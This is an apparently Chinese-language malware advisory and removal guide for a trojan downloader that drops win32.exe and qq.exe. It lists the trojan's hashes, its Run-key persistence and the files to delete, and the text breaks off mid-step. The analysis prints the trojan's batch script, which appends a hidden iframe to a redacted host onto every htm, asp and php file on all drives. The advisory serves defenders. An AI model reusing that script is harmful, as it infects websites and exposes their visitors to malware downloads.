win32.exe qq.exe木马的解决方案

病毒名称：Trojan-Downloader.Win32.VB.bay（Kaspersky）
　　病毒别名：Trojan.DL.Win32.Agent.xtk（瑞星）
　　　　　 Packes.MaskPE.a（毒霸）
　　病毒大小：33,307 字节
　　加壳方式：PE_Patch.MaskPE
　　样本MD5：7caea44acee382600bba6f4d403a031e
　　样本SHA1：683a9758fd7c2afca7d81780ec4ad92407510727
　　传播方式：恶意网页下载，其它病毒或木马下载

　　技术分析
　　==========

　　木马运行后复制副本到系统目录和IE临时目录：
　　%System%\win32.exe
　　%ietemp%\qq.exe

　　创建启动项：

　　[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"qq"="%System%\win32.exe"

　　在当前目录生成批处理kill.bat删除自身原文件：

:redel del "{原文件}" if exist "{原文件}" goto redel del %0 在IE临时目录生成批处理1.bat： [Copy to clipboard] [ - ]CODE: @echo off for %%a in ({各分区}) do ( if exist %%a:\nul ( for /f "tokens=*" %%b in (dir /s/b/a-d %%a:\*.htm) do (echo ^<iframe src=""http://{已屏蔽}"" width=0 height=0 border=0^>^</iframe^>>> "%%b"))) @echo off for %%a in ({各分区}) do ( if exist %%a:\nul ( for /f "tokens=*" %%b in (dir /s/b/a-d %%a:\*.asp) do (echo ^<iframe src="http://{已屏蔽}" width=0 height=0 border=0^>^</iframe^>>> "%%b"))) @echo off for %%a in ({各分区}) do ( if exist %%a:\nul ( for /f "tokens=*" %%b in (dir /s/b/a-d %%a:\*.php) do (echo ^<iframe src="http://{已屏蔽}" width=0 height=0 border=0^>^</iframe^>>> "%%b")))

　　往各分区下所有htm*、asp*、php*文件的末尾添加恶意代码：

　　<iframe src=""http://{已屏蔽}"" width=0 height=0 border=0></iframe>
访问网络下载其它病毒、木马或恶意程序到%UserProfile%\Local Settings目录下并运行，文件名为Temporary Internet Files加数字。

　　清除步骤
　　==========

下载冰刃　　1. 删除木马创建的启动项（打开冰刃－注册表－依次找到病毒注册表选项删除即可）：

　　[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"qq"="%System%\win32.exe"

　　2. 删除木马相关文件（详细步骤：打开冰刃－文件－依次找到病毒文件删除即可）：
　　%System%\win32.exe
　　%ietemp%\qq.exe
　　%ietemp%\1.bat
　　%UserProfile%\Local Settings\Temporary Internet Files{数字}.exe
　　%Windows%\1.ini

　　3. 使用工具清除htm*、asp*、php*文件末尾被添加的恶意代码(建议使用360安全卫士进行其它清理，